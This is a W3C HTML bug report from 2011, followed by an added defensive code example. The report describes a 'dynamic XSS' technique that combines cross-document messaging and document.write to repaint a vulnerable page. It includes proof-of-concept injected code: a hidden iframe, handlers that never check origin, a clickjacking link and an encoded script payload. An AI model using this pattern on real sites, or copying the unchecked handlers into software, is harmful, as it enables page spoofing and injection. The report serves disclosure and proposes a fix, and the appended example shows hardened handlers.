[Bug 12469] New: Dynamic Cross-Site Scripting and Page Repainting

http://www.w3.org/Bugs/Public/show_bug.cgi?id=12469

           Summary: Dynamic Cross-Site Scripting and Page Repainting
           Product: HTML WG
           Version: unspecified
          Platform: All
        OS/Version: All
            Status: NEW
          Severity: critical
          Priority: P2
         Component: HTML5 spec (editor: Ian Hickson)
        AssignedTo: ian@hixie.ch
        ReportedBy: simon.young90@live.com
         QAContact: public-html-bugzilla@w3.org
                CC: mike@w3.org, public-html-wg-issue-tracking@w3.org,
                    public-html@w3.org


It has come to my attention in my studies that the addition of cross-document
messaging in HTML5 allows a new, dynamic form of cross-site scripting to be
developed, employing legitimate communications between injected content. By
accompanying this with the document.write() function, this could then be used
to dynamically control ("repaint") the entire content of a webpage vulnerable to
code injection. A website could then be completely simulated by the XSS attack
while still residing on a legitimate domain, a man-in-the-middle, blue-pill-esque
attack.

In this example, dynamically served code is appended to the original page;
removing document.getElementsByTagName('html')[0].innerHTML would allow the page
to be completely changed:

>>>>> Injected Code:

<!-- Hidden frame pointing at the attacker-controlled "server page" below;
     "URL" stands for that page's address. -->
<iframe id="mommy" src="URL" style="visibility:hidden; height:0; width:0"></iframe>
<script>
    // Wait for the reply from the hidden frame.
    window.addEventListener("message", recvPayload, false);

    function recvPayload(event) {
        // document.write() after the page has finished loading implicitly
        // opens a new document, discarding the current one; writing the old
        // markup followed by the decoded payload re-creates the page with the
        // payload appended. event.origin is never checked, so any frame that
        // can reach this window may supply the data.
        document.write(document.getElementsByTagName('html')[0].innerHTML +
                       unescape(event.data));
    }

    function requestPayload() {
        var frame = document.getElementById("mommy");
        // Target origin "*": the request goes to whatever the frame loaded.
        frame.contentWindow.postMessage("baby wants milk!", "*");
    }
</script>
<!-- "return false" stops the empty href from reloading the page before the
     reply arrives; the link text is a placeholder. -->
<a href="" onclick="requestPayload(); return false;">click</a> <!-- clickjacking -->

>>>>> Server Page:

<script>
    // Answer every "message" event with the payload.
    window.addEventListener("message", sendPayload, false);

    // Percent-encoded <script>alert("Dynamic XSS!");</script>; the injected
    // listener decodes it with unescape() before writing it into the page.
    var payload = ("%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%44%79%6E%61%6D" +
                   "%69%63%20%58%53%53%21%22%29%3B%3C%2F%73%63%72%69%70%74%3E");

    function sendPayload(event) {
        // Reply to the window that asked, addressed to the origin it reported.
        event.source.postMessage(payload, event.origin);
    }
</script>

I propose the addition of a tag which disables any script within its bounds,
perhaps along the lines of <plaintext></plaintext>. This would allow web
developers to stop areas of a page from using script, blocking XSS attacks.

I would appreciate your thoughts on this.

Many Thanks,
Simon Young

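As an added illustration that is not part of Simon Young's report and not text from the HTML5 specification or its editor: the same parent/iframe exchange, written the way a defender would want the two message handlers to look. Every name here is an assumption, specifically PARENT_ORIGIN, CHILD_ORIGIN, MSG_TYPE and the JSON message shape; the fake window/element helpers exist only so the exchange can run under Node as well as in a browser. The listener checks event.origin, insists on a typed message, and assigns the value with textContent instead of document.write(), so the report's payload arrives as literal text; the sender answers only the expected origin and names that origin as the reply target rather than "*".

```javascript
// Added example (not from the bug report). Hypothetical origins and message shape.
const PARENT_ORIGIN = "https://app.example";   // assumed page carrying the injection
const CHILD_ORIGIN = "https://widget.example"; // assumed origin of the framed page
const MSG_TYPE = "text";

// Decode the report's percent-encoded payload (same bytes as on the page) so
// the example can show what the vulnerable listener would have written out.
const REPORT_PAYLOAD = decodeURIComponent(
  "%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%44%79%6E%61%6D" +
  "%69%63%20%58%53%53%21%22%29%3B%3C%2F%73%63%72%69%70%74%3E");

// Receiver side: accept only the expected origin and only the agreed shape.
// The value comes back as data; it is never treated as markup.
function validateMessage(event, allowedOrigin) {
  if (event.origin !== allowedOrigin) {
    return { ok: false, reason: "origin not allowed: " + event.origin };
  }
  let msg = event.data;
  if (typeof msg === "string") {
    try { msg = JSON.parse(msg); } catch (e) {
      return { ok: false, reason: "not JSON" };
    }
  }
  if (msg === null || typeof msg !== "object" ||
      msg.type !== MSG_TYPE || typeof msg.value !== "string") {
    return { ok: false, reason: "unexpected message shape" };
  }
  return { ok: true, text: msg.value };
}

// Sink: textContent stores the string as text, so "<script>" stays literal.
// This replaces document.write(... + unescape(event.data)) from the report.
function renderInto(el, result) {
  if (!result.ok) return false;
  el.textContent = result.text;
  return true;
}

// Sender side: answer only the expected origin, and address the reply to that
// exact origin instead of "*".
function replyTo(event, allowedOrigin, value) {
  if (event.origin !== allowedOrigin) return false;
  event.source.postMessage(JSON.stringify({ type: MSG_TYPE, value }), event.origin);
  return true;
}

// DOM-free stand-ins so the exchange runs under Node.
function fakeEvent(origin, data, source) { return { origin, data, source }; }
function fakeWindow() {
  const w = { sent: [] };
  w.postMessage = (data, targetOrigin) => w.sent.push({ data, targetOrigin });
  return w;
}
function fakeElement() { return { textContent: "" }; }

// Walk the exchange end to end and return what each step decided.
function demo() {
  const parent = fakeWindow(); // the page carrying the injection
  const child = fakeWindow();  // the hidden frame ("mommy") in the report

  // A request from an unexpected origin gets no reply at all.
  const stranger = fakeEvent("https://attacker.example", "baby wants milk!", parent);
  const answeredStranger = replyTo(stranger, PARENT_ORIGIN, REPORT_PAYLOAD);

  // A request from the expected origin is answered, addressed to that origin only.
  replyTo(fakeEvent(PARENT_ORIGIN, "request", parent), PARENT_ORIGIN, REPORT_PAYLOAD);
  const reply = parent.sent[0];

  // The parent accepts the reply only from the child's origin ...
  const wrongOriginReply = validateMessage(
    fakeEvent("https://attacker.example", reply.data, child), CHILD_ORIGIN);
  // ... and only in the agreed shape; the report's bare string is refused.
  const rawStringReply = validateMessage(
    fakeEvent(CHILD_ORIGIN, "baby wants milk!", child), CHILD_ORIGIN);
  // A well-formed reply is rendered, but as text: the <script> never runs.
  const el = fakeElement();
  renderInto(el, validateMessage(fakeEvent(CHILD_ORIGIN, reply.data, child), CHILD_ORIGIN));

  return {
    answeredStranger,
    replyTarget: reply.targetOrigin,
    wrongOriginReply,
    rawStringReply,
    rendered: el.textContent,
  };
}
```

In a real page the two halves live in different documents: the framed page calls replyTo() from its own "message" listener, the embedding page calls validateMessage() and renderInto() from its listener. The origin check is the part that matters most; textContent only limits the damage if an unexpected value does get through.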

Received on Monday, 11 April 2011 10:02:44 UTC